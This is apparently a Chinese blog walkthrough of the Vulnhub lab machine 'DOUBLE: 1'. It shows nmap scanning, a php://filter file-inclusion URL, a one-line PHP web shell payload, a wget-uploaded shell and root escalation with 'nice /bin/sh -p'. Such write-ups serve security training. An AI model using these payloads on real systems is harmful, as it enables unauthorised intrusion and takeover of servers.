Vulnhub靶机——DOUBLE: 1

靶机下载链接在这
VMware和VirtualBox进行互通可参考:Vulnhub靶机——SHENRON: 1
1.主机发现:
netdiscover -r 172.16.10.0/24 -i eth0
在这里插入图片描述
2. 信息收集:
使用nmap进行全端口服务版本扫描:
nmap -n -T5 -p- -sV -sS 172.16.10.212
在这里插入图片描述
发现靶机服务器开启了四个端口:22,25,80,8080;其中有80和8080都是http服务
3. 渗透测试
在这里插入图片描述
这里有两个超链接:Production和TEST
点击Production链接:
在这里插入图片描述
TEST链接:
在这里插入图片描述
尝试弱密码后无效
回到Production页面,这里提示我们提交命令,dir看看:
在这里插入图片描述
这里url中有个可疑的参数:
在这里插入图片描述
尝试进行sql注入无果后,发现这里存在文件包含:
在这里插入图片描述
在这里插入图片描述
尝试读取id_rsa报错了
在这里插入图片描述
尝试使用伪协议读取sendcommand.php:
构造url:
?out=php://filter/convert.base64-encode/resource=/var/www/html/production/sendcommand.php
在这里插入图片描述
解码:
在这里插入图片描述
发现这里输入cmd的指令是通过php进行传递的;构造payload:

<?php system($_GET['cmd']);?>

在这里插入图片描述
send command后出现报错信息:
在这里插入图片描述
尝试运行cmd代码:
在这里插入图片描述
这里能执行命令,wget -help发现这里能用wget命令;直接写马,上传,连接:
在这里插入图片描述
(这里ip和上面不一样的原因是我这里回了下快照重新接着上面做的)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
连接:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
使用find查找可用的suid二进制文件
在这里插入图片描述
在这里插入图片描述
直接使用nice /bin/sh -p提权:
在这里插入图片描述
在这里插入图片描述
成功获取root权限

  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值